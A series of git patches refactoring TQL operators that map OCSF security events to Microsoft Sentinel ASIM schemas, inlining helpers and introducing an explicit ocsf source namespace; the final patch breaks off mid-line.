2024-03-23T12:34:56.789012300Z, From c4499cca20c231328fc8e05c9d83c13ce5e5ecaf Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 16:56:25 +0200 Subject: [PATCH 06/27] Simplify ASIM OCSF mappers Inline small finalization and unsupported branches instead of routing through helper UDOs. Relax Account Change mapping so missing actor names stay nullable output fields rather than rejecting the event. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 6 ++++-- microsoft/operators/asim/ocsf/authentication.tql | 3 ++- .../operators/asim/ocsf/authorize_session.tql | 3 ++- .../operators/asim/ocsf/compliance_finding.tql | 3 ++- .../operators/asim/ocsf/detection_finding.tql | 3 ++- microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 ++- microsoft/operators/asim/ocsf/dns_activity.tql | 3 ++- .../operators/asim/ocsf/entity_management.tql | 3 ++- .../operators/asim/ocsf/event_log_activity.tql | 3 ++- .../operators/asim/ocsf/file_system_activity.tql | 3 ++- microsoft/operators/asim/ocsf/group_management.tql | 3 ++- microsoft/operators/asim/ocsf/helpers/finalize.tql | 7 ------- .../operators/asim/ocsf/helpers/unsupported.tql | 12 ------------ microsoft/operators/asim/ocsf/http_activity.tql | 3 ++- microsoft/operators/asim/ocsf/map.tql | 9 ++++++++- microsoft/operators/asim/ocsf/network_activity.tql | 3 ++- microsoft/operators/asim/ocsf/process_activity.tql | 14 ++++++++++++-- .../operators/asim/ocsf/scheduled_job_activity.tql | 3 ++- .../asim/ocsf/windows_service_activity.tql | 3 ++- 19 files changed, 52 insertions(+), 38 deletions(-) delete mode 100644 microsoft/operators/asim/ocsf/helpers/finalize.tql delete mode 100644 microsoft/operators/asim/ocsf/helpers/unsupported.tql diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 8009444..908b60d 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -4,6 +4,8 @@ description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserMana microsoft::asim::ocsf::helpers::common +assert class_uid == 3001 + @name = "asim.user_management" asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" @@ -13,7 +15,6 @@ if actor?.user?.domain? != null and actor?.user?.name? != null { asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" asim.ActorUsernameType = "Windows" } -assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} asim.ActorUserId = actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null @@ -43,4 +44,5 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 57cdf0a..76f1e5b 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -55,4 +55,5 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 40be37e..4ec10d2 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -52,4 +52,5 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 9f95a88..de4230a 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -38,4 +38,5 @@ match verdict? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 823fe35..45d0f44 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -53,4 +53,5 @@ match verdict? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 835b82b..112fab9 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -19,4 +19,5 @@ asim.SrcMacAddr = src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 6c346d0..0e48901 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -23,4 +23,5 @@ asim.DstIpAddr = dst_endpoint?.ip? asim.DstHostname = dst_endpoint?.hostname? assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 4ec2bd3..34a8ed0 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index b764b0e..3ff486e 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 1e17f87..7e2e334 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -34,4 +34,5 @@ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\" assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 8ff4cea..ce7ccb2 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -39,4 +39,5 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/helpers/finalize.tql b/microsoft/operators/asim/ocsf/helpers/finalize.tql deleted file mode 100644 index f55a356..0000000 --- a/microsoft/operators/asim/ocsf/helpers/finalize.tql +++ /dev/null @@ -1,7 +0,0 @@ ---- -description: Finalizes an initialized ASIM event and preserves the original OCSF event. ---- - -asim.AdditionalFields = {...this} -drop asim.AdditionalFields.asim -this = asim diff --git a/microsoft/operators/asim/ocsf/helpers/unsupported.tql b/microsoft/operators/asim/ocsf/helpers/unsupported.tql deleted file mode 100644 index 9d62845..0000000 --- a/microsoft/operators/asim/ocsf/helpers/unsupported.tql +++ /dev/null @@ -1,12 +0,0 @@ ---- -description: Drops unsupported OCSF to ASIM mappings with a warning. ---- - -assert false, message={ - reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, - name: @name, -} diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 95866cc..cf3c96d 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -16,4 +16,5 @@ if http_response?.code? != null { } assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index 3fe08b4..f9025c4 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -52,6 +52,13 @@ match class_uid { microsoft::asim::ocsf::dhcp_activity } _ => { - microsoft::asim::ocsf::helpers::unsupported + assert false, message={ + reason: "unsupported OCSF to ASIM mapping", + class_uid: class_uid?, + class_name: class_name?, + type_uid: type_uid?, + type_name: type_name?, + name: @name, + } } } diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 8836cf6..9363d98 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -30,4 +30,5 @@ match disposition? { _ => {} } -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 6143e90..7b35b9f 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -10,7 +10,16 @@ asim.EventSchemaVersion = "0.1.4" match activity_name { "Launch" => { asim.EventType = "ProcessCreated" } "Terminate" => { asim.EventType = "ProcessTerminated" } - _ => { microsoft::asim::ocsf::helpers::unsupported } + _ => { + assert false, message={ + reason: "unsupported OCSF to ASIM mapping", + class_uid: class_uid?, + class_name: class_name?, + type_uid: type_uid?, + type_name: type_name?, + name: @name, + } + } } asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? if actor?.user?.domain? != null and actor?.user?.name? != null { @@ -28,4 +37,5 @@ asim.TargetUserId = user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index a32b74e..a9302c9 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index ec9b967..60a3938 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -37,4 +37,5 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -microsoft::asim::ocsf::helpers::finalize +this = {...asim, AdditionalFields: {...this}} +drop AdditionalFields.asim From 874193f13fb6307d1c918eb920df2977b42f36d0 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:03:37 +0200 Subject: [PATCH 07/27] Avoid ASIM state in AdditionalFields Snapshot the OCSF source event before creating the temporary ASIM working record, then use that snapshot when populating AdditionalFields. This keeps implementation-only mapper state out of the preserved source event instead of dropping it after the fact. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 3 +-- microsoft/operators/asim/ocsf/authentication.tql | 3 +-- microsoft/operators/asim/ocsf/authorize_session.tql | 3 +-- microsoft/operators/asim/ocsf/compliance_finding.tql | 3 +-- microsoft/operators/asim/ocsf/detection_finding.tql | 3 +-- microsoft/operators/asim/ocsf/dhcp_activity.tql | 3 +-- microsoft/operators/asim/ocsf/dns_activity.tql | 3 +-- microsoft/operators/asim/ocsf/entity_management.tql | 3 +-- microsoft/operators/asim/ocsf/event_log_activity.tql | 3 +-- microsoft/operators/asim/ocsf/file_system_activity.tql | 3 +-- microsoft/operators/asim/ocsf/group_management.tql | 3 +-- microsoft/operators/asim/ocsf/helpers/common.tql | 1 + microsoft/operators/asim/ocsf/http_activity.tql | 3 +-- microsoft/operators/asim/ocsf/network_activity.tql | 3 +-- microsoft/operators/asim/ocsf/process_activity.tql | 3 +-- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 3 +-- microsoft/operators/asim/ocsf/windows_service_activity.tql | 3 +-- 17 files changed, 17 insertions(+), 32 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 908b60d..f4cb3cd 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -44,5 +44,4 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 76f1e5b..30189e8 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -55,5 +55,4 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index 4ec10d2..076665b 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -52,5 +52,4 @@ if auth_factors? != null { asim.LogonMethod = auth_factors[0]?.factor_type? } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index de4230a..08331ac 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -38,5 +38,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 45d0f44..96c313c 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -53,5 +53,4 @@ match verdict? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 112fab9..9306362 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -19,5 +19,4 @@ asim.SrcMacAddr = src_endpoint?.mac? assert asim.SrcHostname != null and asim.SrcIpAddr != null and asim.SrcMacAddr != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 0e48901..91555f0 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -23,5 +23,4 @@ asim.DstIpAddr = dst_endpoint?.ip? asim.DstHostname = dst_endpoint?.hostname? assert asim.DnsQuery != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 34a8ed0..05e4eb1 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 3ff486e..d428ef1 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index 7e2e334..ac54b6c 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -34,5 +34,4 @@ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\" assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index ce7ccb2..69f3038 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -39,5 +39,4 @@ asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else nu asim.SrcIpAddr = src_endpoint?.ip? asim.SrcHostname = src_endpoint?.hostname? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/helpers/common.tql index 441db8f..afc25d3 100644 --- a/microsoft/operators/asim/ocsf/helpers/common.tql +++ b/microsoft/operators/asim/ocsf/helpers/common.tql @@ -2,6 +2,7 @@ description: Initializes shared ASIM fields from a validated OCSF event. --- +_ocsf = this asim = {} asim.EventCount = 1 diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index cf3c96d..cb366d7 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -16,5 +16,4 @@ if http_response?.code? != null { } assert asim.Url != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index 9363d98..aab0a54 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -30,5 +30,4 @@ match disposition? { _ => {} } -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index 7b35b9f..4601260 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -37,5 +37,4 @@ asim.TargetUserId = user?.uid? assert asim.ActorUsername != null and asim.ActingProcessId != null and asim.TargetProcessId != null and asim.TargetProcessName != null and asim.TargetProcessCommandLine != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index a9302c9..874cf5f 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 60a3938..a42553b 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -37,5 +37,4 @@ asim.SrcIpAddr = src_endpoint?.ip? asim.TargetHostname = dst_endpoint?.hostname? asim.TargetIpAddr = dst_endpoint?.ip? -this = {...asim, AdditionalFields: {...this}} -drop AdditionalFields.asim +this = {...asim, AdditionalFields: _ocsf} From cfc22ad14990d693f5b0a56fe14083e74947404a Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:11:49 +0200 Subject: [PATCH 08/27] Use explicit OCSF source namespace Initialize ASIM OCSF mappers with separate ocsf and asim records, then read source fields through ocsf while building the ASIM output. Keep the account-change class assertion before the common wrapper so it validates the original OCSF event shape. Assisted-by: GPT-5 Codex (Superconductor) --- .../operators/asim/ocsf/account_change.tql | 32 +++---- .../operators/asim/ocsf/authentication.tql | 50 +++++------ .../operators/asim/ocsf/authorize_session.tql | 48 +++++------ .../asim/ocsf/compliance_finding.tql | 24 +++--- .../operators/asim/ocsf/detection_finding.tql | 26 +++--- .../operators/asim/ocsf/dhcp_activity.tql | 12 +-- .../operators/asim/ocsf/dns_activity.tql | 24 +++--- .../operators/asim/ocsf/entity_management.tql | 24 +++--- .../asim/ocsf/event_log_activity.tql | 24 +++--- .../asim/ocsf/file_system_activity.tql | 24 +++--- .../operators/asim/ocsf/group_management.tql | 30 +++---- .../operators/asim/ocsf/helpers/common.tql | 85 +++++++++---------- .../operators/asim/ocsf/http_activity.tql | 14 +-- .../operators/asim/ocsf/network_activity.tql | 22 ++--- .../operators/asim/ocsf/process_activity.tql | 34 ++++---- .../asim/ocsf/scheduled_job_activity.tql | 24 +++--- .../asim/ocsf/windows_service_activity.tql | 24 +++--- 17 files changed, 260 insertions(+), 261 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index f4cb3cd..2f438a8 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -2,23 +2,23 @@ description: Maps OCSF Account Change events to Microsoft Sentinel ASIM UserManagement events. --- -microsoft::asim::ocsf::helpers::common - assert class_uid == 3001 +microsoft::asim::ocsf::helpers::common + @name = "asim.user_management" asim.EventSchema = "UserManagement" asim.EventSchemaVersion = "0.1.2" asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -match activity_name { +match ocsf.activity_name { "Create" => { asim.EventType = "UserCreated" } "Delete" => { asim.EventType = "UserDeleted" } "Update" => { asim.EventType = "UserModified" } @@ -31,17 +31,17 @@ match activity_name { _ => { asim.EventType = "UserModified" } } -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if user?.domain? != null and user?.name? != null { - asim.TargetUsername = f"{user.domain}\\{user.name}" +asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? +if ocsf.user?.domain? != null and ocsf.user?.name? != null { + asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" asim.TargetUsernameType = "Windows" } -asim.TargetUserId = user?.uid? +asim.TargetUserId = ocsf.user?.uid? asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null -asim.GroupName = group?.name? -asim.GroupId = group?.uid? +asim.GroupName = ocsf.group?.name? +asim.GroupId = ocsf.group?.uid? asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null -asim.SrcIpAddr = src_endpoint?.ip? -asim.SrcHostname = src_endpoint?.hostname? +asim.SrcIpAddr = ocsf.src_endpoint?.ip? +asim.SrcHostname = ocsf.src_endpoint?.hostname? -this = {...asim, AdditionalFields: _ocsf} +this = {...asim, AdditionalFields: ocsf} diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 30189e8..40db64a 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -7,11 +7,11 @@ microsoft::asim::ocsf::helpers::common @name = "asim.authentication" asim.EventSchema = "Authentication" asim.EventSchemaVersion = "0.1.4" -match activity_name { +match ocsf.activity_name { "Logoff" => { asim.EventType = "Logoff" } _ => { asim.EventType = "Logon" } } -match logon_type? { +match ocsf.logon_type? { "System" => { asim.EventSubType = "System" } "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { asim.EventSubType = "Interactive" @@ -23,36 +23,36 @@ match logon_type? { "OS Service" => { asim.EventSubType = "Service" } _ => {} } -if logon_type? != null { - asim.EventOriginalSubType = logon_type +if ocsf.logon_type? != null { + asim.EventOriginalSubType = ocsf.logon_type } -asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? -if actor?.user?.domain? != null and actor?.user?.name? != null { - asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" +asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? +if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { + asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" asim.ActorUsernameType = "Windows" } -asim.ActorUserId = actor?.user?.uid? +asim.ActorUserId = ocsf.actor?.user?.uid? asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null -asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? -asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? -if 